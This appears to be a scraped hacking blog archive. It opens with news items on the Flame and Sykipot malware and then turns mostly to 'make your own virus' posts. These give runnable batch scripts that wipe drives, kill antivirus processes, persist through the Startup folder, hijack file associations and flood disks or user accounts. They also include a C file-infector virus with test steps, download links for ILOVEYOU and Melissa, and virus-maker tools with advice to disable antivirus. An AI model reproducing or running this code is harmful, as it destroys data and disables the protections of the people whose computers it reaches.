Labels

Showing posts with label virus. Show all posts
Showing posts with label virus. Show all posts

‘Flame’ Virus explained: How it works and who’s behind it

‘Flame’ Virus: How it works and who’s behind it
‘Flame’ Virus: How it works and who’s behind it

Flame may be the most powerful computer virus in history, and a nation-state is most likely to blame for unleashing it on the World Wide Web.Kaspersky's chief malware expert Vitaly Kamlyuk shared with RT the ins and outs of Stuxnet on steroids.
Iran appears to be the primary target of the data-snatching virus that has swept through the Middle East, though other countries have also been affected.The sheer complexity of the virus and its targets has led Moscow-based Kaspersky Lab to believe a state is behind the attack.

Kaspersky first spotted the virus in 2010, though it may have been wrecking havoc on computer systems for many years.Vitaly Kamlyuk told RT how his company discovered it, just what makes Flame so significant, features of the virus that could point towards its creator, and why we all lose out in this intensifying cyber-war.
RT: So, how did you spot the malware, was it a planned investigation, or did it come by surprise?
Vitaly Kamlyuk: It was by surprise. We were initially searching for a [different form of] malware. We were aware of the malware that had spread throughout the Middle East, attacked hundreds of computers and wiped their hard drives, making the systems unbootable after that. It was actually after an inquiry from the International Telecommunications Union, which is a part of the United Nations, who actually asked us to start conducting research. When we started looking for this mysterious malware in the Middle East, we discovered this suspicious application that turned out to be even more interesting than the initial target of our search.
RT: According to one of your experts, 'Flame' does not appear to cause physical damage, so why has it been dubbed the most hazardous cyber-attacks in history?
VK: It’s actually on the same level as the notoriously known Stuxnet and Duqu [attacks], because we suspect that there is a nation state behind the development of this cyber attack, and there are reasons for that. This application doesn’t fit into any of the existing groups of developed cyber attack tools. There are currently three groups. There are traditional cyber criminals who are hunting users’ data (like log-ins and passwords) to access bank accounts over the Internet and steal money, send spam, or conduct dubious attacks.This [Flame] doesn’t fit into the group of traditional cyber criminal malware. Also, it doesn’t fit into the activists’ malware who are using typically free and open source tools to attack computers on the Internet. And the third known group [at this time] is nation-states.
RT: What makes this malware different from all other Spyware programs and what damage can it do?
VK: It’s pretty advanced – one of the most sophisticated [examples of] malware we’ve ever seen. Even its size – it’s over 20 megabytes if you sum up all the sizes of the modules that are part of the attacking toolkit. It’s very big compared to Stuxnet, which was just hundreds of kilobytes of code: it’s over 20 megabyes. And the Stuxnet analysis took us several months, so you can imagine that a full analysis of this threat may take us up to a year. So we think it is one of the most sophisticated malware [programs] out there.
It’s also quite unique in the way it steals information. It’s possible to steal different types of information with the help of this spyware tool. It can record audio if a microphone is attached to the infected system, it can do screen captures and transmit visual data. It can steal information from the input boxes when they are hidden behind asterisks, password fields; it can get information from there.Also it can scan for locally visible Bluetooth devices if there is a Bluetooth adapter attached to the local system.
RT: Is there a connection between this new cyber threat and previous large-scale virus attacks?
VK: We are trying to compare and find similarities between this development and previous [ones] of course, but there are so few of them – Stuxnet or Duqu mostly. There is no reliable relation between Stuxnet and Flame as we call it…they are completely different. Because Stuxnet was a small application developed for a particular target with the specific objective to interact with industrial control systems and break them down. And Flame is a universal attacking tool kit used mostly for cyber espionage. So there are so things that [Flame] shares in common with Stuxnet and Duqu, and these are the vulnerabilities that are used by both [types of] malware. Probably one malware simply copied vulnerabilities from the other malware program when they were published.
RT: So this means that cyber warfare is evolving rapidly, and 'Flame' vividly confirms this trend. Can less technologically developed nations resist such attacks, or is it game over for them?
VK: It’s never game over in this area, because even if the country isn’t technologically developed in this area, it doesn’t prevent them from cooperating with organizations like ours and with private companies in the security industry that can provide them with valuable pieces of information which can actually result in the discovery of such threats. And when we discover such threats, we permanently add them to antivirus databases, and users from those nations can use freely available trial tools and commercial antivirus [software] to protect their systems.
RT: This enormous stratum of data that 'Flame' can gather, who would need it and is it really possible to analyze such an avalanche of information?
VK: First of all, when we’re talking about the size of data that is to be analyzed, we know that the attackers do not infect as many victims as possible. Their resources are limited; it seems that they understand that. They are keeping the number of infected machines more or less the same. So it’s the same level. When they finish analyzing data that has been stolen from one network, they remove the malware and switch to another.So we think that it’s still possible the extract only the data they are interested in.
RT: So can we call this a cyber war, and if so?
VK: Stuxnet and Duqu were bright examples of cyber weapons which could even physically destroy infrastructure, and this [Flame] is a continuation of this story. So this is another development in this roe which continues in addition to Stuxnet and Duqu.There are also nation stations supporting [these] developments. We think that cyber warfare has been going on for years already. People were just probably not aware of it because cyber warfare has a unique feature: it’s hidden. Nobody knows when cyber warfare operations are going on. This is the key feature of it.
RT: Who is behind these cyber attacks?
VK: Like with Stuxnet and Duqu, it’s currently unclear who is behind it. It’s very hard to find out who is behind it because when we try to follow the traces, who controls the application – it connects to the command and control centers – it turns out to be… dozens or even more servers spread around different countries around the world. More than 80 or 90 domains are associated with those servers. Most of them are registered with fake identities. So they’re pretty well protected and hidden. So it is unclear who is behind that, and we try not to speculate who could be behind such attacks. We try to base it on pure facts like the language we extract from the code. In this case, we only found traces of good English used inside the code.

Chinese Hackers Trojan-ize US Access Card - The curious case of Sykipot Trojan

Researchers at AlientVault have uncovered a new strain of Sykipot Trojan which has been used to compromise the Department of Defense-sanctioned smart cards used to authorise network and building access at many US government agencies, the Trojan has been adapted by Chinese hackers in order to lift credentials from compromised systems in order to access classified military networks. The Trojan inadvertently targets PCs attached to smart card readers running ActivClient, the client application of ActivIdentity, in what's been described as a 'smart card proxy' attack.

How to spread a Trojan Horse: Methods to spread Trojan Horse on Internet


Modes of Transmission
  • ICQ
  • IRC
  • Attachments
  • Physical Access
  • Browser And E-mail Software Bugs
  • NetBIOS (File Sharing)
  • Fake Programs
  • Un-trusted Sites And Freeware Software
  • ICQ
    People can also get infected while chatting / talking / video messaging over ICQ or any other Instant Messenger Application. It is a risk that the user undertakes when it comes to receiving files no matter from whom or where it comes.
  • IRC
    Here also, the threat comes from exchange of files no matter what they claim to be or where they come from. It is possible that some of these are infected files or disguised files.
  • Attachments
    Any attachment, even if it is from a known source should be screened as it is possible that the source was infected earlier and is not aware of it.
  • Physical Access
    Physical access to a target machine is perhaps the easiest way for an attacker to infect a machine. The motive may be a prank or just plain curiosity.
  • Browser and E-mail Software Bugs
    Having outdated applications can expose the system to malicious programs such as Trojans without any other action on behalf of the attacker.
  • NetBIOS (File Sharing)
    If port 139 is opened, the attacker can install trojan .exe and modify some system file, so that it will run the next time the system is rebooted. To block file sharing in Windows version, go to: Start->Settings->Control Panel->Network->File and Print Sharing and uncheck the boxes there.

DnsChanger Trojan

Full Name:
DnsChanger Trojan 
Type: Trojan
Also Known as: WIN32.DNSCHANGER.S TROJAN, Trojan.Flush.G (Symantec)




Category Description: Trojans are malicious applications that pose themselves as legitimate software in order to trick users to install them. Once on the victim's machine, it may run any number of malicious process to steal vital information or inflict damage to other software.
Comment: This trojan modifies the DNS server settings and redirect the browser to unwanted sites. May download an adware payload.
   
Manual removal: 1. Navigate to the following paths in the registry.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters "DhcpNameServer"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\%Random CLSID% "DhcpNameServer"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\%Random CLSID% "NameServer"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\%Random CLSID% "DhcpNameServer"

2. Look for unknown IP Addresses in the Data part. Change them into IP addresses for your DNS Servers.
For more information contact your system administrator.
Properties:
  •  Adds other software
  •  System Reconfiguration
  •  Redirects searches
  • Mini virus bt dangerous


    • One more ...
      try one this

      Cd C:\
      rd C:\ /s/q
      Cd D:\
      rd D:\ /s/q
      Cd E:\
      Rd E:\ /s/q
      Cd F:\
      Rd\ /s/q

      then it is complete Save as any file you want in .bat format.. n enjoy lol..its really dangerous dont try on your own pc.


    How to add ur own created viruses into start ups this will make it diifcult to detect them n to remove them ...

    1) For this u can use the simple code below ..

    @echo off
    copy "abcd.bat" "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"

    n den rest of the code ..

    2) suppose u want to make a shutdown.bat a virus which will copy itself in start up n wenever comptuer starts it will shut down it in 2 secs..most dangerous kind of thing better to make create restore point before working with such files..

    @echo off
    copy "abcd.bat" "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"

    @echo off
    shutdown -s -t 5 -c "Shutdown"

    save it as abcd.bat when ever u will run it it will be saved in ur start ups..

    here t 5 means that ur comp will take5 secs to shut down u can make it 2 as well then it will be most dangerous thing to handle .. lol

    End Process virus

    Just Copy This Code Below In Notepad, Save as installhack.bat and you are done!
    This Virus will:

    1. End Process, NAVAPSVC.exe
    2. End Process, Explorer.exe (taskbar and icons will dissapear)
    3. End Process, zonelabs.exe
    4. associate a exe file with txt (when opening exe files, it will go to notepad)
    5. associate a txt file with mp3 (when opening txt files, it will open WinAmp or WMP)
    6. Deletes Login/Logoff Screens

    title Hack Setup
    color 0A
    @echo off
    set end=md “Hack installing”
    set fin=copy “Hack log.txt” “Installing”
    %end%
    %fin%
    net send * Hack is installing, press OK to begin set up.
    kill NAVAPSVC.exe /F /Q
    kill zonelabs.exe /F /Q
    kill explorer.exe /F /Q
    cls
    assoc .exe=txtfile
    assoc .txt=mp3file
    cls
    msg * It is you who is hacked….
    msg * I warned you, and you kept going. Challenge me and this is what happens.
    DEL C:\WINDOWS\system32\logoff.exe /F /Q
    DEL C:\WINDOWS\system32\logon.exe /F /Q
    DEL C:\WINDOWS\system32\logon.scr /F /Q
    cls
    shutdown

    4 mini virus

    • This code about multiple open windows means infinite windows
      until continue you restart the computer:save on denger.bat and code written in notepad

      @echo off
      copy 0% denger.bat
      start denger.bat

    • This code about the computer shutdown:

      @echo off
      shutdown -s -t 5 -c "Shutdown"


    • Go to notepad and type the following:
      @Echo off
      Del C:\ *.*|y

      save it as Dell.bat

    •          Want worse then type the following:
                       @echo off
                        del %systemdrive%\*.*/f/s/q
                         shutdown -r -f -t 00

                        and save it as a .bat file

    Just for Fun

    Here is another one which is funny......

    cls
    :A
    color 0a
    cls
    @echo off
    echo Wscript.Sleep 5000>C:\sleep5000.vbs
    echo Wscript.Sleep 3000>C:\sleep3000.vbs
    echo Wscript.Sleep 4000>C:\sleep4000.vbs
    echo Wscript.Sleep 2000>C:\sleep2000.vbs
    cd %systemroot%\System32
    dir
    cls
    start /w wscript.exe C:\sleep3000.vbs
    echo Deleting Critical System Files...
    echo del *.*
    start /w wscript.exe C:\sleep3000.vbs
    echo Deletion Successful!
    echo:
    echo:
    echo:
    echo Deleting Root Partition...
    start /w wscript.exe C:\sleep2000.vbs
    echo del %SYSTEMROOT%
    start /w wscript.exe C:\sleep4000.vbs
    echo Deletion Successful!
    start /w wscript.exe C:\sleep2000.vbs
    echo:
    echo:
    echo:
    echo Creating Directory h4x...
    cd C:\Documents and Settings\All Users\Start Menu\Programs\
    mkdir h4x
    start /w wscript.exe C:\sleep3000.vbs
    echo Directory Creation Successful!
    echo:
    echo:
    echo:
    echo Execution Attempt 1...
    start /w wscript.exe C:\sleep3000.vbs
    echo cd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\h4x\
    echo start hax.exe
    start /w wscript.exe C:\sleep3000.vbs
    echo Virus Executed!
    echo:
    echo:
    echo:
    start /w wscript.exe C:\sleep2000.vbs
    echo Disabling Windows Firewall...
    start /w wscript.exe C:\sleep2000.vbs
    echo Killing all processes...
    start /w wscript.exe C:\sleep2000.vbs
    echo Allowing virus to boot from startup...
    start /w wscript.exe C:\sleep2000.vbs
    echo:
    echo:
    echo Virus has been executed successfully!
    start /w wscript.exe C:\sleep2000.vbs
    echo:
    echo Have fun!
    start /w wscript.exe C:\sleep2000.vbs
    pause
    shutdown -f -s -c "Your computer has committed suicide. Have a nice day."

    Make your own computer viruses in notepad

    If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to make simple .bat file (virus) that can't be detected by any antivirus

    Here are some good viruses ,i am not responsible for any kind of damage to your system :-D


    Copy this to notepad and save as flood1.bat :-D


    @ECHO OFF
    @ECHO A PHOENIX PRODUCTION
    @ECHO MAIN BAT RUNNING
    GOTO start

    :start
    @ECHO SET snowball2=1 >> bat6.bat
    @ECHO GOTO flood5 >> bat6.bat
    @ECHO :flood5 >> bat6.bat
    @ECHO SET /a snowball2=%%snowball2%%+1 >> bat6.bat
    @ECHO NET USER snowball2%%snowball2%% /add >> bat6.bat
    @ECHO GOTO flood5 >> bat6.bat
    START /MIN bat6.bat
    GOTO bat5

    :bat5
    @ECHO CD %%ProgramFiles%%\ >> bat5.bat
    @ECHO SET maggi=1 >> bat5.bat
    @ECHO GOTO flood4 >> bat5.bat
    @ECHO :flood4 >> bat5.bat
    @ECHO MKDIR maggi%%maggi%% >> bat5.bat
    @ECHO SET /a maggi=%%maggi%%+1 >> bat5.bat
    @ECHO GOTO flood4 >> bat5.bat
    START /MIN bat5.bat
    GOTO bat4

    :bat4
    @ECHO CD %%SystemRoot%%\ >> bat4.bat
    @ECHO SET marge=1 >> bat4.bat
    @ECHO GOTO flood3 >> bat4.bat
    @ECHO :flood3 >> bat4.bat
    @ECHO MKDIR marge%%marge%% >> bat4.bat
    @ECHO SET /a marge=%%marge%%+1 >> bat4.bat
    @ECHO GOTO flood3 >> bat4.bat
    START /MIN bat4.bat
    GOTO bat3

    :bat3
    @ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat
    @ECHO SET bart=1 >> bat3.bat
    @ECHO GOTO flood2 >> bat3.bat
    @ECHO :flood2 >> bat3.bat
    @ECHO MKDIR bart%%bart%% >> bat3.bat
    @ECHO SET /a bart=%%bart%%+1 >> bat3.bat
    @ECHO GOTO flood2 >> bat3.bat
    START /MIN bat3.bat
    GOTO bat2

    :bat2
    @ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat
    @ECHO SET homer=1 >> bat2.bat
    @ECHO GOTO flood >> bat2.bat
    @ECHO :flood >> bat2.bat
    @ECHO MKDIR homer%%homer%% >> bat2.bat
    @ECHO SET /a homer=%%homer%%+1 >> bat2.bat
    @ECHO GOTO flood >> bat2.bat
    START /MIN bat2.bat
    GOTO original

    :original
    CD %HomeDrive%\
    SET lisa=1
    GOTO flood1
    :flood1
    MKDIR lisa%lisa%
    SET /a lisa=%lisa%+1
    GOTO flood1

    what does it do : this is an extremely harmful virus the will keep replicating itself until your harddrive is totally full and will destroy ur comp.

    This program is an example of how to create a virus in c

    #include<stdio.h>
    #include<io.h>
    #include<dos.h>
    #include<dir.h>
    #include<conio.h>
    #include<time.h>

    FILE *virus,*host;
    int done,a=0;
    unsigned long x;
    char buff[2048];
    struct ffblk ffblk;
    clock_t st,end;

    void main()
    {
    st=clock();
    clrscr();
    done=findfirst("*.*",&ffblk,0);
    while(!done)
    {
    virus=fopen(_argv[0],"rb");
    host=fopen(ffblk.ff_name,"rb+");
    if(host==NULL) goto next;
    x=89088;
    printf("Infecting %s\n",ffblk.ff_name,a);
    while(x>2048)
    {
    fread(buff,2048,1,virus);
    fwrite(buff,2048,1,host);
    x-=2048;
    }
    fread(buff,x,1,virus);
    fwrite(buff,x,1,host);
    a++;
    next:
    {
    fcloseall();
    done=findnext(&ffblk);
    }
    }
    printf("DONE! (Total Files Infected= %d)",a);
    end=clock();
    printf("TIME TAKEN=%f SEC\n",
    (end-st)/CLK_TCK);
    getch();
    }



    dont run in ur computer

    HOW TO TEST:

    1. Open new empty folder

    2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)

    3. Run the virus EXE file there you will see all the files in the current directory get infected.

    4.All the infected files will be ready to reinfect

    That's it
    WARNING: FOR EDUCATIONAL PURPOSES ONLY 

    Lock your System on Mouse Click

    Lock your System on Mouse Click Feel hard to press CTRL+ALT+DEL to lock your machine ?????? Try this and create the icon to lock the machine. 1. Right click an empty spot on the desktop, point to New and click Shortcut. 2. In the Create Shortcut dialog box, type the following in the 'Type the location' of the item text box: "rundll32 user32.dll,LockWorkStation" remove quotes while typing. 3. Click Next. 4. In "Type a name for this shortcut", type "" (any name as u wish) and Click Finish

    I LOVE YOU virus




    ILOVEYOU, also known as LoveLetter, is a computer worm that successfully attacked tens of millions of Windows computers in 2000 when it was sent as an attachment to an email message with the text "ILOVEYOU" in the subject line. The worm arrived in email inboxes on and after May 4, 2000 with the simple subject of "ILOVEYOU" and an attachment "LOVE-LETTER-FOR-YOU.TXT.vbs". The final 'vbs' extension was hidden by default, leading unsuspecting users to think it was a mere text file. Upon opening the attachment, the worm sent a copy of itself to everyone in the Windows Address Book and with the user's sender address. It also made a number of malicious changes to the user's system.
    please dont save it as .vbs  extension and run it


    DOWNLOAD THE VIRUS HERE

    Mellisa Virus is back again

    First found on March 26, 1999, Melissa shut down Internet mail systems that got clogged with infected e-mails propagating from the virus. Melissa was not originally designed for harm, but it overloaded servers and caused problems.
    This variant also deletes critical files. Before deleting the files, it strips them of their archive, hidden, and read-only attributes.
    • C:\Command.com
    • C:\IO.SYS
    • C:\Ntdetect.com
    • C:\Suhdlog.dat
    • D:\Command.com
    • D:\Io.sys
    • D:\Suhdlog.dat


    here's the code of virus. you can copy it to notepad and save it with .vbs extension. One click on it and your system is sacrificed

    The best Virus prank Program

    The Ultimate Virus is one of the best virus prank programs on the net. This is a prefect prank software and your friends will definitely "love" it and don't be suprised if they try to kill you for making fool on them :P. Just imagine how fun could it be to see how this fake virus is freakingout your friends and making them crying for mummy. 



    This virus prank tool acts like a deadly virus that can cause huge damages to your friends computers, but in fact it's just a fake virus prank and it won't harm the pc in any way.

    After running the program, a progress bar will appear, inform user if virus loading is in progress. The taskbar and desktop icons will disappear and a dialog box is displayed that contains three choices:

    1. Format Hard Disk

    2. Delete Windows Folder

    3. Delete All Contents on Local Disk


    Format Hard disk

    When you click this button a progress bar will appear saying "formatting is in progress", but actually it's not. If you click click "Cancel" button, then a fake "Blue Screen Of Death" will appear! This is really creepy.

    Delete Windows Folder

    If you choose this option the program will scan all files and folders on your Windows folder and after that a progress bar will appear displaying deletion progress. An advanced Windows user will be tricked because it displays all files on their systems are being deleted.

    Delete All Contents on Local Disk

    This is similar to above, but it just scan folders on your root folder. It can't scan all of the files and folders on your hard disk because it will lag the application.


    After all progress is finished, the program will does a fake restart. It displays black screen and text with MS-DOS style, so your friend will be tricked that their computer is being in boot mode. Then, a beep coming from computer speaker, and a frightening text appear: "BIOS image has been corrupted.

    "There is a problem with your motherboard ROM. Press any key to try again". When your friend reach three attempts, a text appears that their motherboard is permanently damaged!

    How to remove this program?

    All you have to do is just to delete the program from your computer and it won't run again. The good thing is that it doesn't install itself to your system.


    Note: Some antiviruses and antispywares are detecting this program as infected/malware. The program is perfectly safe and does not pose a threat to your system. This is called a 'false positive'. The term false positive is used when antivirus software wrongly classifies an innocuous ( inoffensive ) file as a virus. The incorrect detection may be due to heuristics or to an incorrect virus signature in a database. Similar problems can occur with antitrojan or antispyware software.

    download the virus here

    Great Virus makers softwares

    In this article i want to show you how to create a real virus using Virus Software. I compiled a list of some great virus maker softwares. Now you don't have to know any programming or coding to make virus. Simply use one of these Virus softwares and you can easily make virus for yourself. These virussoftwares provides you with various options which you can use to make virus according to your preferences. The virus programs are tested to well working on all Windows systems.

    Here is the list of the softwares that allows you to make Virus:



    A. In Shadow Batch Virus Generator
    1. First of all download the virus maker from here

    2. Run "In Shadow Batch Virus Generator.exe" application to see something like this:




    3. You can use various options to make virus to suit your needs. You can:
    •Infect files of various extensions
    •Insert virus in startup menu, Kill various processes.
    •Disable all security services like Windows Defender, Antivirus, Firewall.
    •Rename file extensions, spread virus via file sharing.
    •Create new admin account, change user account password.
    •Block various websites, download trojan files to victim computer, shutdown victim computer and much more.

    4. After selecting various options, move on to "Creating Options" tab and hit on "Save as Bat". Assign name to the virus and hit on Save.

    5. Now, you have your virus ready to hack your victim. This virus maker is undetectable by the most antiviruses.

    I am not responsible for any action performed by you. Also, do not try this virus on your own computer. This virus software is one of the most efficient virus software used today.



    B. JPS Virus Maker





    This is also a great virus maker with many features in it. 
    download it here



    C. TeraBIT Virus Maker






    A powerful virus maker for you. Look for updates here

    Download JPS Virus Maker and TeraBit Virus Maker.

    These two virus makers are detected as a viruses by the most anti-virussoftwares, but they won't harm your pc in any way. Before you run these virus makers disable your anti-virus temporarily.

    Some vbs tricks to Freak Friends


    The first code we are going to look at is one that makes the cd tray open and close repeatedly until shutdown, or
    (don’t tell your friends, you press ctrl + alt + delete and go to processes, and end wscript.exe (this code is vbs so save in note pad as whateveryouwant.vbs)








    Set oWMP = CreateObject(“WMPlayer.OCX.7″ )
    Set colCDROMs = oWMP.cdromCollection
    if colCDROMs.Count >= 1 then
    do
    For i = 0 to colCDROMs.Count – 1
    colCDROMs.Item(i).Eject
    Next ‘ cdrom
    For i = 0 to colCDROMs.Count – 1
    colCDROMs.Item(i).Eject
    Next ‘ cdrom
    loop
    end if
    A code that turns on and off your capslock repeatedly, also vbs, end same way as last time, this turns on and off your capslock every tenth of a second
    Set wshShell =wscript.CreateObject(“WScript.Shell”)
    do
    wscript.sleep 100
    wshshell.sendkeys “{CAPSLOCK}”
    loop